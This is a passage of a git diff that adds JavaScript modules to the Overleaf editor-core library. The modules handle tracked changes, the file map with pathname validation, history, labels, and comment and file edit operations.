newTrackedChanges.push(trackedChange) + } + } + if (opts.tracking instanceof TrackingProps) { + // This is a new tracked change + const newTrackedChange = new TrackedChange(retainedRange, opts.tracking) + newTrackedChanges.push(newTrackedChange) + } + 
this._trackedChanges = newTrackedChanges + this._mergeRanges() + } +} + +module.exports = TrackedChangeList diff --git a/libraries/overleaf-editor-core/lib/file_data/tracking_props.js b/libraries/overleaf-editor-core/lib/file_data/tracking_props.js new file mode 100644 index 0000000..75ec95c --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/tracking_props.js @@ -0,0 +1,67 @@ +// @ts-check +/** + * @import { TrackingPropsRawData, TrackingDirective } from "../types" + */ + +class TrackingProps { + /** + * + * @param {'insert' | 'delete'} type + * @param {string} userId + * @param {Date} ts + */ + constructor(type, userId, ts) { + /** + * @readonly + * @type {'insert' | 'delete'} + */ + this.type = type + /** + * @readonly + * @type {string} + */ + this.userId = userId + /** + * @readonly + * @type {Date} + */ + this.ts = ts + } + + /** + * + * @param {TrackingPropsRawData} raw + * @returns {TrackingProps} + */ + static fromRaw(raw) { + return new TrackingProps(raw.type, raw.userId, new Date(raw.ts)) + } + + /** + * @returns {TrackingPropsRawData} + */ + toRaw() { + return { + type: this.type, + userId: this.userId, + ts: this.ts.toISOString(), + } + } + + /** + * @param {TrackingDirective} [other] + * @returns {boolean} + */ + equals(other) { + if (!(other instanceof TrackingProps)) { + return false + } + return ( + this.type === other.type && + this.userId === other.userId && + this.ts.getTime() === other.ts.getTime() + ) + } +} + +module.exports = TrackingProps diff --git a/libraries/overleaf-editor-core/lib/file_map.js b/libraries/overleaf-editor-core/lib/file_map.js new file mode 100644 index 0000000..4412319 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_map.js @@ -0,0 +1,390 @@ +// @ts-check +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert +const OError = require('@overleaf/o-error') +const pMap = require('p-map') + +const File = require('./file') +const safePathname = require('./safe_pathname') + +/** + * @import { RawFile, RawFileMap } from './types' + * + * @typedef {Record} FileMapData + */ + +class PathnameError extends OError {} + +class NonUniquePathnameError extends PathnameError { + /** + * @param {string[]} pathnames + */ + constructor(pathnames) { + super('pathnames are not unique', { pathnames }) + this.pathnames = pathnames + } +} + +class BadPathnameError extends PathnameError { + /** + * @param {string} pathname + * @param {string} reason + */ + constructor(pathname, reason) { + if (pathname.length > 10) { + pathname = pathname.slice(0, 5) + '...' + pathname.slice(-5) + } + super('invalid pathname', { reason, pathname }) + this.pathname = pathname + } +} + +class PathnameConflictError extends PathnameError { + /** + * @param {string} pathname + */ + constructor(pathname) { + super('pathname conflicts with another file', { pathname }) + this.pathname = pathname + } +} + +class FileNotFoundError extends PathnameError { + /** + * @param {string} pathname + */ + constructor(pathname) { + super('file does not exist', { pathname }) + this.pathname = pathname + } +} + +/** + * A set of {@link File}s. Several properties are enforced on the pathnames: + * + * 1. File names and paths are case sensitive and can differ by case alone. This + * is consistent with most Linux file systems, but it is not consistent with + * Windows or OS X. Ideally, we would be case-preserving and case insensitive, + * like they are. 
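Before moving on, a minimal usage sketch for the TrackingProps value object defined just above; the require path is hypothetical and assumes a script run from the repository root.

const TrackingProps = require('./libraries/overleaf-editor-core/lib/file_data/tracking_props') // hypothetical path

// The raw form carries an ISO timestamp string; fromRaw()/toRaw() round-trip it.
const raw = { type: 'insert', userId: 'user-1', ts: '2024-01-01T00:00:00.000Z' }
const props = TrackingProps.fromRaw(raw)

console.log(props.toRaw()) // { type: 'insert', userId: 'user-1', ts: '2024-01-01T00:00:00.000Z' }
console.log(props.equals(TrackingProps.fromRaw(raw))) // true: compares type, userId and timestamp
console.log(props.equals(undefined)) // false: equals() guards with instanceof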
And we used to be, but it caused too many incompatibilities + * with the old system, which was case sensitive. See + * https://github.com/overleaf/overleaf-ot-prototype/blob/ + * 19ed046c09f5a4d14fa12b3ea813ce0d977af88a/editor/core/lib/file_map.js + * for an implementation of this map with those properties. + * + * 2. Uniqueness: No two pathnames are the same. + * + * 3. No type conflicts: A pathname cannot refer to both a file and a directory + * within the same snapshot. That is, you can't have pathnames `a` and `a/b` in + * the same file map; {@see FileMap#wouldConflict}. + */ +class FileMap { + static PathnameError = PathnameError + static NonUniquePathnameError = NonUniquePathnameError + static BadPathnameError = BadPathnameError + static PathnameConflictError = PathnameConflictError + static FileNotFoundError = FileNotFoundError + + /** + * @param {Record} files + */ + constructor(files) { + // create bare object for use as Map + // http://ryanmorr.com/true-hash-maps-in-javascript/ + /** @type FileMapData */ + this.files = Object.create(null) + _.assign(this.files, files) + checkPathnamesAreUnique(this.files) + checkPathnamesDoNotConflict(this) + } + + /** + * @param {RawFileMap} raw + * @returns {FileMap} + */ + static fromRaw(raw) { + assert.object(raw, 'bad raw files') + return new FileMap(_.mapValues(raw, File.fromRaw)) + } + + /** + * Convert to raw object for serialization. + * + * @return {RawFileMap} + */ + toRaw() { + /** + * @param {File} file + * @return {RawFile} + */ + function fileToRaw(file) { + return file.toRaw() + } + // TODO(das7pad): refine types to enforce no nulls in FileMapData + // @ts-ignore + return _.mapValues(this.files, fileToRaw) + } + + /** + * Create the given file. + * + * @param {string} pathname + * @param {File} file + */ + addFile(pathname, file) { + checkPathname(pathname) + assert.object(file, 'bad file') + // TODO(das7pad): make ignoredPathname argument fully optional + // @ts-ignore + checkNewPathnameDoesNotConflict(this, pathname) + addFile(this.files, pathname, file) + } + + /** + * Remove the given file. + * + * @param {string} pathname + */ + removeFile(pathname) { + checkPathname(pathname) + + const key = findPathnameKey(this.files, pathname) + if (!key) { + throw new FileMap.FileNotFoundError(pathname) + } + delete this.files[key] + } + + /** + * Move or remove a file. If the origin file does not exist, or if the old + * and new paths are identical, this has no effect. + * + * @param {string} pathname + * @param {string} newPathname if a blank string, {@link FileMap#removeFile} + */ + moveFile(pathname, newPathname) { + if (pathname === newPathname) return + if (newPathname === '') return this.removeFile(pathname) + checkPathname(pathname) + checkPathname(newPathname) + checkNewPathnameDoesNotConflict(this, newPathname, pathname) + + const key = findPathnameKey(this.files, pathname) + if (!key) { + throw new FileMap.FileNotFoundError(pathname) + } + const file = this.files[key] + delete this.files[key] + + addFile(this.files, newPathname, file) + } + + /** + * The number of files in the file map. + * + * @return {number} + */ + countFiles() { + return _.size(this.files) + } + + /** + * Get a file by its pathname. + * + * @param {string} pathname + * @return {File | null | undefined} + */ + getFile(pathname) { + const key = findPathnameKey(this.files, pathname) + if (key) return this.files[key] + } + + /** + * Whether the given pathname conflicts with any file in the map. 
+ * + * Paths conflict in type if one path is a strict prefix of the other path. For + * example, 'a/b' conflicts with 'a', because in the former case 'a' is a + * folder, but in the latter case it is a file. Similarly, the pathname 'a/b/c' + * conflicts with 'a' and 'a/b', but it does not conflict with 'a/b/c', 'a/x', + * or 'a/b/x'. (In our case, identical paths don't conflict, because AddFile + * and MoveFile overwrite existing files.) + * + * @param {string} pathname + * @param {string?} ignoredPathname pretend this pathname does not exist + */ + wouldConflict(pathname, ignoredPathname) { + checkPathname(pathname) + assert.maybe.string(ignoredPathname) + const pathnames = this.getPathnames() + const dirname = pathname + '/' + // Check the filemap to see whether the supplied pathname is a + // parent of any entry, or any entry is a parent of the pathname. + for (let i = 0; i < pathnames.length; i++) { + // First check if pathname is a strict prefix of pathnames[i] (and that + // pathnames[i] is not ignored) + if ( + pathnames[i].startsWith(dirname) && + !pathnamesEqual(pathnames[i], ignoredPathname) + ) { + return true + } + // Now make the reverse check, whether pathnames[i] is a strict prefix of + // pathname. To avoid expensive string concatenation on each pathname we + // first perform a partial check with a.startsWith(b), and then do the + // full check for a subsequent '/' if this passes. This saves about 25% + // of the runtime. Again only return a conflict if pathnames[i] is not + // ignored. + if ( + pathname.startsWith(pathnames[i]) && + pathname.length > pathnames[i].length && + pathname[pathnames[i].length] === '/' && + !pathnamesEqual(pathnames[i], ignoredPathname) + ) { + return true + } + } + // No conflicts - after excluding ignoredPathname, there were no entries + // which were a strict prefix of pathname, and pathname was not a strict + // prefix of any entry. + return false + } + + /** @see Snapshot#getFilePathnames */ + getPathnames() { + return _.keys(this.files) + } + + /** + * Map the files in this map to new values. + * @template T + * @param {(file: File | null, path: string) => T} iteratee + * @return {Record} + */ + map(iteratee) { + return _.mapValues(this.files, iteratee) + } + + /** + * Map the files in this map to new values asynchronously, with an optional + * limit on concurrency. 
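The pairwise conflict rule described here is small enough to sketch standalone. The following is not the library implementation, just a distilled version of the rule from the docblock:

// Two pathnames conflict when one, treated as a directory (trailing '/'),
// is a strict prefix of the other; identical paths do not conflict.
function pathsConflict(a, b) {
  return a !== b && (b.startsWith(a + '/') || a.startsWith(b + '/'))
}

console.log(pathsConflict('a', 'a/b'))   // true: 'a' cannot be both a file and a folder
console.log(pathsConflict('a', 'a/b/c')) // true: same reason, one level deeper
console.log(pathsConflict('a/b', 'a/x')) // false: siblings are fine
console.log(pathsConflict('a/b', 'a/b')) // false: AddFile/MoveFile overwrite instead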
* @template T + * @param {(file: File | null | undefined, path: string, pathnames: string[]) => T} iteratee + * @param {number} [concurrency] + * @return {Promise<Record<string, T>>} + */ + async mapAsync(iteratee, concurrency) { + assert.maybe.number(concurrency, 'bad concurrency') + + const pathnames = this.getPathnames() + const files = await pMap( + pathnames, + file => { + return iteratee(this.getFile(file), file, pathnames) + }, + { concurrency: concurrency || 1 } + ) + return _.zipObject(pathnames, files) + } +} + +/** + * @param {string} pathname0 + * @param {string?} pathname1 + * @returns {boolean} + */ +function pathnamesEqual(pathname0, pathname1) { + return pathname0 === pathname1 +} + +/** + * @param {FileMapData} files + * @returns {boolean} + */ +function pathnamesAreUnique(files) { + const keys = _.keys(files) + return _.uniqWith(keys, pathnamesEqual).length === keys.length +} + +/** + * @param {FileMapData} files + */ +function checkPathnamesAreUnique(files) { + if (pathnamesAreUnique(files)) return + throw new FileMap.NonUniquePathnameError(_.keys(files)) +} + +/** + * @param {string} pathname + */ +function checkPathname(pathname) { + assert.nonEmptyString(pathname, 'bad pathname') + const [isClean, reason] = safePathname.isCleanDebug(pathname) + if (isClean) return + throw new FileMap.BadPathnameError(pathname, reason) +} + +/** + * @param {FileMap} fileMap + * @param {string} pathname + * @param {string?} ignoredPathname + */ +function checkNewPathnameDoesNotConflict(fileMap, pathname, ignoredPathname) { + if (fileMap.wouldConflict(pathname, ignoredPathname)) { + throw new FileMap.PathnameConflictError(pathname) + } +} + +/** + * @param {FileMap} fileMap + */ +function checkPathnamesDoNotConflict(fileMap) { + const pathnames = fileMap.getPathnames() + // check pathnames for validity first + pathnames.forEach(checkPathname) + // convert pathnames to candidate directory names + const dirnames = [] + for (let i = 0; i < pathnames.length; i++) { + dirnames[i] = pathnames[i] + '/' + } + // sort in lexical order and check if one directory contains another + dirnames.sort() + for (let i = 0; i < dirnames.length - 1; i++) { + if (dirnames[i + 1].startsWith(dirnames[i])) { + // strip trailing slash to get original pathname + const conflictPathname = dirnames[i + 1].slice(0, -1) + throw new FileMap.PathnameConflictError(conflictPathname) + } + } +} + +/** + * This function is somewhat vestigial: it was used when this map used + * case-insensitive pathname comparison. We could probably simplify some of the + * logic in the callers, but in the hope that we will one day return to + * case-insensitive semantics, we've just left things as-is for now. + * + * TODO(das7pad): In a followup, inline this function and make types stricter.
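checkPathnamesDoNotConflict leans on a useful property: once every pathname gets a trailing '/' and the list is sorted lexically, any prefix pair ends up adjacent (any string that sorts between a dirname and one of its extensions must share the same prefix), so one linear scan over neighbours suffices. A standalone sketch of the idea:

function findConflict(pathnames) {
  // Append '/' so 'a' is compared as a directory, then sort lexically.
  const dirnames = pathnames.map(p => p + '/').sort()
  for (let i = 0; i < dirnames.length - 1; i++) {
    // Only adjacent pairs need comparing after the sort.
    if (dirnames[i + 1].startsWith(dirnames[i])) {
      return dirnames[i + 1].slice(0, -1) // strip the trailing slash again
    }
  }
  return null
}

console.log(findConflict(['a/b', 'c', 'a'])) // 'a/b': 'a/' is a prefix of 'a/b/'
console.log(findConflict(['a/b', 'a/c']))    // null: siblings do not conflict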
+ * + * @param {FileMapData} files + * @param {string} pathname + * @returns {string | undefined} + */ +function findPathnameKey(files, pathname) { + // we can check for the key without worrying about properties + // in the prototype because we are now using a bare object/ + if (pathname in files) return pathname +} + +/** + * @param {FileMapData} files + * @param {string} pathname + * @param {File?} file + */ +function addFile(files, pathname, file) { + const key = findPathnameKey(files, pathname) + if (key) delete files[key] + files[pathname] = file +} + +module.exports = FileMap diff --git a/libraries/overleaf-editor-core/lib/history.js b/libraries/overleaf-editor-core/lib/history.js new file mode 100644 index 0000000..d9d1253 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/history.js @@ -0,0 +1,135 @@ +'use strict' + +const assert = require('check-types').assert +const pMap = require('p-map') + +const Change = require('./change') +const Snapshot = require('./snapshot') + +/** + * @import { BlobStore } from "./types" + */ + +class History { + /** + * @constructor + * @param {Snapshot} snapshot + * @param {Array.} changes + * + * @classdesc + * A History is a {@link Snapshot} and a sequence of {@link Change}s that can + * be applied to produce a new snapshot. + */ + constructor(snapshot, changes) { + assert.instance(snapshot, Snapshot, 'bad snapshot') + assert.maybe.array.of.instance(changes, Change, 'bad changes') + + this.snapshot = snapshot + /** @type {Array} */ + this.changes = changes || [] + } + + static fromRaw(raw) { + return new History( + Snapshot.fromRaw(raw.snapshot), + raw.changes.map(Change.fromRaw) + ) + } + + toRaw() { + function changeToRaw(change) { + return change.toRaw() + } + return { + snapshot: this.snapshot.toRaw(), + changes: this.changes.map(changeToRaw), + } + } + + getSnapshot() { + return this.snapshot + } + + getChanges() { + return this.changes + } + + countChanges() { + return this.changes.length + } + + /** + * Add changes to this history. + * + * @param {Array.} changes + */ + pushChanges(changes) { + this.changes.push.apply(this.changes, changes) + } + + /** + * If this History references blob hashes, either in the Snapshot or the + * Changes, add them to the given set. + * + * @param {Set.} blobHashes + */ + findBlobHashes(blobHashes) { + function findChangeBlobHashes(change) { + change.findBlobHashes(blobHashes) + } + this.snapshot.findBlobHashes(blobHashes) + this.changes.forEach(findChangeBlobHashes) + } + + /** + * If this History contains any File objects, load them. + * + * @param {string} kind see {File#load} + * @param {BlobStore} blobStore + * @return {Promise} + */ + async loadFiles(kind, blobStore) { + async function loadChangeFiles(changes) { + for (const change of changes) { + await change.loadFiles(kind, blobStore) + } + } + + await Promise.all([ + this.snapshot.loadFiles(kind, blobStore), + loadChangeFiles(this.changes), + ]) + } + + /** + * Return a version of this history that is suitable for long term storage. + * This requires that we store the content of file objects in the provided + * blobStore. 
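A minimal History round trip, as a sketch; the require paths are hypothetical, and `new Snapshot()` creating an empty snapshot is an assumption based on how the class is used elsewhere in this library.

const History = require('./libraries/overleaf-editor-core/lib/history')   // hypothetical path
const Snapshot = require('./libraries/overleaf-editor-core/lib/snapshot') // hypothetical path

const history = new History(new Snapshot(), []) // assumed no-argument empty snapshot
history.pushChanges([]) // appending an empty batch is a no-op
console.log(history.countChanges()) // 0

const hashes = new Set()
history.findBlobHashes(hashes) // collects hashes from the snapshot and all changes
console.log(hashes.size) // 0 for an empty history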
+ * + * @param {BlobStore} blobStore + * @param {number} [concurrency] applies separately to files, changes and + * operations + * @return {Promise} + */ + async store(blobStore, concurrency) { + assert.maybe.number(concurrency, 'bad concurrency') + + /** + * @param {Change} change + */ + async function storeChange(change) { + return await change.store(blobStore, concurrency) + } + + const [rawSnapshot, rawChanges] = await Promise.all([ + this.snapshot.store(blobStore, concurrency), + pMap(this.changes, storeChange, { concurrency: concurrency || 1 }), + ]) + return { + snapshot: rawSnapshot, + changes: rawChanges, + } + } +} + +module.exports = History diff --git a/libraries/overleaf-editor-core/lib/label.js b/libraries/overleaf-editor-core/lib/label.js new file mode 100644 index 0000000..958f758 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/label.js @@ -0,0 +1,99 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert + +/** + * @import { RawLabel } from './types' + */ + +/** + * @classdesc + * A user-configurable label that can be attached to a specific change. Labels + * are not versioned, and they are not stored alongside the Changes in Chunks. + * They are instead intended to provide external markers into the history of the + * project. + */ +class Label { + /** + * @constructor + * @param {string} text + * @param {number?} authorId + * @param {Date} timestamp + * @param {number} version + */ + constructor(text, authorId, timestamp, version) { + assert.string(text, 'bad text') + assert.maybe.integer(authorId, 'bad author id') + assert.date(timestamp, 'bad timestamp') + assert.integer(version, 'bad version') + + this.text = text + this.authorId = authorId + this.timestamp = timestamp + this.version = version + } + + /** + * Create a Label from its raw form. + * + * @param {RawLabel} raw + * @return {Label} + */ + static fromRaw(raw) { + return new Label( + raw.text, + raw.authorId, + new Date(raw.timestamp), + raw.version + ) + } + + /** + * Convert the Label to raw form for transmission. + * + * @return {RawLabel} + */ + toRaw() { + return { + text: this.text, + authorId: this.authorId, + timestamp: this.timestamp.toISOString(), + version: this.version, + } + } + + /** + * @return {string} + */ + getText() { + return this.text + } + + /** + * The ID of the author, if any. Note that we now require all saved versions to + * have an author, but this was not always the case, so we have to allow nulls + * here for historical reasons. 
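A short Label round trip as a sketch (hypothetical require path):

const Label = require('./libraries/overleaf-editor-core/lib/label') // hypothetical path

const label = Label.fromRaw({
  text: 'submitted to journal',
  authorId: 123, // may be null on old labels, as noted above
  timestamp: '2024-01-01T00:00:00.000Z',
  version: 42,
})

console.log(label.getText())         // 'submitted to journal'
console.log(label.getVersion())      // 42
console.log(label.toRaw().timestamp) // back to an ISO string via toISOString()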
+ * + * @return {number | null | undefined} + */ + getAuthorId() { + return this.authorId + } + + /** + * @return {Date} + */ + getTimestamp() { + return this.timestamp + } + + /** + * @return {number} + */ + getVersion() { + return this.version + } +} + +module.exports = Label diff --git a/libraries/overleaf-editor-core/lib/operation/add_comment_operation.js b/libraries/overleaf-editor-core/lib/operation/add_comment_operation.js new file mode 100644 index 0000000..9165d42 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/add_comment_operation.js @@ -0,0 +1,150 @@ +// @ts-check +const core = require('../../index') +const Comment = require('../comment') +const Range = require('../range') +const EditOperation = require('./edit_operation') + +/** + * @import DeleteCommentOperation from './delete_comment_operation' + * @import { CommentRawData, RawAddCommentOperation } from '../types' + * @import StringFileData from '../file_data/string_file_data' + */ + +/** + * @extends EditOperation + */ +class AddCommentOperation extends EditOperation { + /** + * @param {string} commentId + * @param {ReadonlyArray} ranges + * @param {boolean} resolved + */ + constructor(commentId, ranges, resolved = false) { + super() + + for (const range of ranges) { + if (range.isEmpty()) { + throw new Error("AddCommentOperation can't be built with empty ranges") + } + } + + /** @readonly */ + this.commentId = commentId + + /** @readonly */ + this.ranges = ranges + + /** @readonly */ + this.resolved = resolved + } + + /** + * + * @returns {RawAddCommentOperation} + */ + toJSON() { + /** @type RawAddCommentOperation */ + const raw = { + commentId: this.commentId, + ranges: this.ranges.map(range => range.toRaw()), + } + if (this.resolved) { + raw.resolved = true + } + return raw + } + + /** + * @param {StringFileData} fileData + */ + apply(fileData) { + fileData.comments.add( + new Comment(this.commentId, this.ranges, this.resolved) + ) + } + + /** + * @inheritdoc + * @param {StringFileData} previousState + * @returns {EditOperation} + */ + invert(previousState) { + const comment = previousState.comments.getComment(this.commentId) + if (!comment) { + return new core.DeleteCommentOperation(this.commentId) + } + + return new core.AddCommentOperation( + comment.id, + comment.ranges.slice(), + comment.resolved + ) + } + + /** + * @inheritdoc + * @param {EditOperation} other + * @returns {boolean} + */ + canBeComposedWith(other) { + return ( + (other instanceof AddCommentOperation && + this.commentId === other.commentId) || + (other instanceof core.DeleteCommentOperation && + this.commentId === other.commentId) || + (other instanceof core.SetCommentStateOperation && + this.commentId === other.commentId) + ) + } + + /** + * @inheritdoc + * @param {EditOperation} other + * @returns {EditOperation} + */ + compose(other) { + if ( + other instanceof core.DeleteCommentOperation && + other.commentId === this.commentId + ) { + return other + } + + if ( + other instanceof AddCommentOperation && + other.commentId === this.commentId + ) { + return other + } + + if ( + other instanceof core.SetCommentStateOperation && + other.commentId === this.commentId + ) { + return new AddCommentOperation( + this.commentId, + this.ranges, + other.resolved + ) + } + + throw new Error( + `Trying to compose AddCommentOperation with ${other?.constructor?.name}.` + ) + } + + /** + * @inheritdoc + * @param {RawAddCommentOperation} raw + * @returns {AddCommentOperation} + */ + static fromJSON(raw) { + return new AddCommentOperation( + 
raw.commentId, + raw.ranges.map(Range.fromRaw), + raw.resolved ?? false + ) + } +} + +module.exports = AddCommentOperation diff --git a/libraries/overleaf-editor-core/lib/operation/add_file_operation.js b/libraries/overleaf-editor-core/lib/operation/add_file_operation.js new file mode 100644 index 0000000..8b4b014 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/add_file_operation.js @@ -0,0 +1,78 @@ +'use strict' + +const assert = require('check-types').assert + +const File = require('../file') +const Operation = require('./') + +/** + * Adds a new file to a project. + */ +class AddFileOperation extends Operation { + /** + * @param {string} pathname + * @param {File} file + */ + constructor(pathname, file) { + super() + assert.string(pathname, 'bad pathname') + assert.object(file, 'bad file') + + this.pathname = pathname + this.file = file + } + + /** + * @return {String} + */ + getPathname() { + return this.pathname + } + + /** + * TODO + * @param {Object} raw + * @return {AddFileOperation} + */ + static fromRaw(raw) { + return new AddFileOperation(raw.pathname, File.fromRaw(raw.file)) + } + + /** + * @inheritdoc + */ + toRaw() { + return { pathname: this.pathname, file: this.file.toRaw() } + } + + /** + * @inheritdoc + */ + getFile() { + return this.file + } + + /** @inheritdoc */ + findBlobHashes(blobHashes) { + const hash = this.file.getHash() + if (hash) blobHashes.add(hash) + } + + /** @inheritdoc */ + async loadFiles(kind, blobStore) { + return await this.file.load(kind, blobStore) + } + + async store(blobStore) { + const rawFile = await this.file.store(blobStore) + return { pathname: this.pathname, file: rawFile } + } + + /** + * @inheritdoc + */ + applyTo(snapshot) { + snapshot.addFile(this.pathname, this.file.clone()) + } +} +module.exports = AddFileOperation diff --git a/libraries/overleaf-editor-core/lib/operation/delete_comment_operation.js b/libraries/overleaf-editor-core/lib/operation/delete_comment_operation.js new file mode 100644 index 0000000..4f4a457 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/delete_comment_operation.js @@ -0,0 +1,70 @@ +// @ts-check +const core = require('../../index') +const EditNoOperation = require('./edit_no_operation') +const EditOperation = require('./edit_operation') + +/** + * @import AddCommentOperation from './add_comment_operation' + * @import StringFileData from '../file_data/string_file_data' + * @import { RawDeleteCommentOperation } from '../types' + */ + +/** + * @extends EditOperation + */ +class DeleteCommentOperation extends EditOperation { + /** + * @param {string} commentId + */ + constructor(commentId) { + super() + this.commentId = commentId + } + + /** + * @inheritdoc + * @returns {RawDeleteCommentOperation} + */ + toJSON() { + return { + deleteComment: this.commentId, + } + } + + /** + * @inheritdoc + * @param {StringFileData} fileData + */ + apply(fileData) { + fileData.comments.delete(this.commentId) + } + + /** + * @inheritdoc + * @param {StringFileData} previousState + * @returns {AddCommentOperation | EditNoOperation} + */ + invert(previousState) { + const comment = previousState.comments.getComment(this.commentId) + if (!comment) { + return new EditNoOperation() + } + + return new core.AddCommentOperation( + comment.id, + comment.ranges.slice(), + comment.resolved + ) + } + + /** + * @inheritdoc + * @param {RawDeleteCommentOperation} raw + * @returns {DeleteCommentOperation} + */ + static fromJSON(raw) { + return new DeleteCommentOperation(raw.deleteComment) + } +} + +module.exports = 
DeleteCommentOperation diff --git a/libraries/overleaf-editor-core/lib/operation/edit_file_operation.js b/libraries/overleaf-editor-core/lib/operation/edit_file_operation.js new file mode 100644 index 0000000..8505b8a --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_file_operation.js @@ -0,0 +1,105 @@ +// @ts-check +'use strict' +/** + * @import EditOperation from './edit_operation' + * @import { RawEditFileOperation } from '../types' + * @import Snapshot from "../snapshot" + */ + +const Operation = require('./') +const EditOperationBuilder = require('./edit_operation_builder') + +/** + * Edit a file in place. It is a wrapper around a single EditOperation. + */ +class EditFileOperation extends Operation { + /** + * @param {string} pathname + * @param {EditOperation} operation + */ + constructor(pathname, operation) { + super() + this.pathname = pathname + this.operation = operation + } + + /** + * @inheritdoc + */ + toRaw() { + return { + pathname: this.pathname, + ...this.operation.toJSON(), + } + } + + /** + * Deserialize an EditFileOperation. + * + * @param {RawEditFileOperation} raw + * @return {EditFileOperation} + */ + static fromRaw(raw) { + return new EditFileOperation( + raw.pathname, + EditOperationBuilder.fromJSON(raw) + ) + } + + getPathname() { + return this.pathname + } + + getOperation() { + return this.operation + } + + /** + * @inheritdoc + * @param {Snapshot} snapshot + */ + applyTo(snapshot) { + // TODO(das7pad): can we teach typescript our polymorphism? + // @ts-ignore + snapshot.editFile(this.pathname, this.operation) + } + + /** + * @inheritdoc + * @param {Operation} other + * @return {boolean} + */ + canBeComposedWithForUndo(other) { + return ( + this.canBeComposedWith(other) && + this.operation.canBeComposedWithForUndo(other.operation) + ) + } + + /** + * @inheritdoc + * @param {Operation} other + * @return {other is EditFileOperation} + */ + canBeComposedWith(other) { + // Ensure that other operation is an edit file operation + if (!(other instanceof EditFileOperation)) return false + // Ensure that both operations are editing the same file + if (this.getPathname() !== other.getPathname()) return false + + return this.operation.canBeComposedWith(other.operation) + } + + /** + * @inheritdoc + * @param {EditFileOperation} other + */ + compose(other) { + return new EditFileOperation( + this.pathname, + this.operation.compose(other.operation) + ) + } +} + +module.exports = EditFileOperation diff --git a/libraries/overleaf-editor-core/lib/operation/edit_no_operation.js b/libraries/overleaf-editor-core/lib/operation/edit_no_operation.js new file mode 100644 index 0000000..81eae0d --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_no_operation.js @@ -0,0 +1,29 @@ +const EditOperation = require('./edit_operation') + +/** + * @import { RawEditNoOperation } from '../types' + */ + +class EditNoOperation extends EditOperation { + /** + * @inheritdoc + * @param {StringFileData} fileData + */ + apply(fileData) {} + + /** + * @inheritdoc + * @returns {RawEditNoOperation} + */ + toJSON() { + return { + noOp: true, + } + } + + static fromJSON() { + return new EditNoOperation() + } +} + +module.exports = EditNoOperation diff --git a/libraries/overleaf-editor-core/lib/operation/edit_operation.js b/libraries/overleaf-editor-core/lib/operation/edit_operation.js new file mode 100644 index 0000000..5058bb0 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_operation.js @@ -0,0 +1,91 @@ +// @ts-check +/** + * @import FileData from 
'../file_data' + * @import { RawEditOperation } from '../types' + */ + +class EditOperation { + constructor() { + if (this.constructor === EditOperation) { + throw new Error('Cannot instantiate abstract class') + } + } + + /** + * Converts operation into a JSON value. + * @returns {RawEditOperation} + */ + toJSON() { + throw new Error('Abstract method not implemented') + } + + /** + * @abstract + * @param {FileData} fileData + */ + apply(fileData) { + throw new Error('Abstract method not implemented') + } + + /** + * Determine the effect of this operation on the length of the text. + * + * NB: This is an Overleaf addition to the original OT system. + * + * @param {number} length of the original string; non-negative + * @return {number} length of the new string; non-negative + */ + applyToLength(length) { + return length + } + + /** + * Computes the inverse of an operation. The inverse of an operation is the + * operation that reverts the effects of the operation, e.g. when you have an + * operation 'insert("hello "); skip(6);' then the inverse is 'remove("hello "); + * skip(6);'. The inverse should be used for implementing undo. + * @param {FileData} previousState + * @returns {EditOperation} + */ + invert(previousState) { + throw new Error('Abstract method not implemented') + } + + /** + * + * @param {EditOperation} other + * @returns {boolean} + */ + canBeComposedWith(other) { + return false + } + + /** + * When you use ctrl-z to undo your latest changes, you expect the program not + * to undo every single keystroke but to undo your last sentence you wrote at + * a stretch or the deletion you did by holding the backspace key down. This + * can be implemented by composing operations on the undo stack. This + * method can help decide whether two operations should be composed. It + * returns true if the operations are consecutive insert operations or both + * operations delete text at the same position. You may want to include other + * factors like the time since the last change in your decision. + * @param {EditOperation} other + */ + canBeComposedWithForUndo(other) { + return false + } + + /** + * Compose merges two consecutive operations into one operation, that + * preserves the changes of both. Or, in other words, for each input string S + * and a pair of consecutive operations A and B, + * apply(apply(S, A), B) = apply(S, compose(A, B)) must hold.
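The compose law can be spot-checked concretely. A sketch assuming the TextOperation builder API (retain/insert/compose) from this library's ot.js lineage, with apply() mutating a StringFileData; require paths are hypothetical:

const TextOperation = require('./libraries/overleaf-editor-core/lib/operation/text_operation')     // hypothetical path
const StringFileData = require('./libraries/overleaf-editor-core/lib/file_data/string_file_data') // hypothetical path

const A = new TextOperation().retain(5).insert('!').retain(6) // 'hello world' -> 'hello! world'
const B = new TextOperation().retain(12).insert('?')          // append '?'

// Left side: apply A, then B.
const left = new StringFileData('hello world')
A.apply(left)
B.apply(left)

// Right side: apply compose(A, B) in one step.
const right = new StringFileData('hello world')
A.compose(B).apply(right)

console.log(left.getContent(), right.getContent()) // 'hello! world?' both times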
+ * @param {EditOperation} other + * @returns {EditOperation} + */ + compose(other) { + throw new Error('Abstract method not implemented') + } +} + +module.exports = EditOperation diff --git a/libraries/overleaf-editor-core/lib/operation/edit_operation_builder.js b/libraries/overleaf-editor-core/lib/operation/edit_operation_builder.js new file mode 100644 index 0000000..febdebc --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_operation_builder.js @@ -0,0 +1,93 @@ +// @ts-check + +/** + * @import EditOperation from './edit_operation' + * @import { RawTextOperation, RawAddCommentOperation, RawEditOperation } from '../types' + * @import { RawDeleteCommentOperation, RawSetCommentStateOperation } from '../types' + */ + +const DeleteCommentOperation = require('./delete_comment_operation') +const AddCommentOperation = require('./add_comment_operation') +const TextOperation = require('./text_operation') +const SetCommentStateOperation = require('./set_comment_state_operation') +const EditNoOperation = require('./edit_no_operation') + +class EditOperationBuilder { + /** + * + * @param {RawEditOperation} raw + * @returns {EditOperation} + */ + static fromJSON(raw) { + if (isTextOperation(raw)) { + return TextOperation.fromJSON(raw) + } + if (isRawAddCommentOperation(raw)) { + return AddCommentOperation.fromJSON(raw) + } + if (isRawDeleteCommentOperation(raw)) { + return DeleteCommentOperation.fromJSON(raw) + } + if (isRawSetCommentStateOperation(raw)) { + return 